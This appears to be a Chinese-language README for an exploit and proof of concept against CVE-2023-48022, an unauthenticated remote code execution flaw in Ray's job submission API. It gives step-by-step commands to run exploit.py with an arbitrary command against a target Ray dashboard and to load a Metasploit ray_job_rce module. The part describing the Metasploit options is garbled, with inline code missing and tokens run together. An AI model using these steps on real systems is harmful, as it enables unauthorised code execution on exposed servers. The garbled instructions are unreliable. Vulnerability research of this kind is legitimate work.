此漏洞利用脚本和PoC是为在vSociety上进行的深入CVE分析而编写。
Ray框架是一个用于Python AI和机器学习应用的重要工具,最近遇到了一个重大的安全挑战。本质上,Ray就像一个瑞士军刀,服务于从事AI和大数据项目的人员。该漏洞被标识为CVE-2023-48022,具体影响作业提交API。官方描述指出,该漏洞允许远程攻击者执行任意代码,对使用这些Ray版本的系统构成重大风险。该漏洞的发现凸显了软件框架中强大安全协议的重要性,特别是那些处理海量数据和计算能力的AI和ML项目。
首先,安装Ray:
pip3 install -U "ray[default]"==2.8.0
然后,启动Ray:
ray start --head --dashboard-host=0.0.0.0
运行Python利用脚本:
python3 exploit.py --host http://192.168.150.16:8265 --cmd '<cmd>'
将Ruby文件复制到Metasploit的相关目录:
cp ray_job_rce.rb /usr/share/metasploit-framework/modules/exploits/multi/misc/
使用 msfconsole 启动Metasploit,如果找不到添加的模块,用 重新加载模块。
可以选择 。
设置必要的选项(、、 等),然后使用命令 运行利用。
reload_alluse exploit/multi/misc/ray_job_rceRHOSTRPORTCOMMANDexploit此利用脚本仅为研究和开发有效的防御技术而创建。它不应用于任何恶意或未经授权的活动。脚本的作者和所有者不承担因使用本软件而导致的任何滥用或损害的责任或义务。请注意,用户应负责任地使用本软件,并遵守适用的法律法规。请负责任地使用。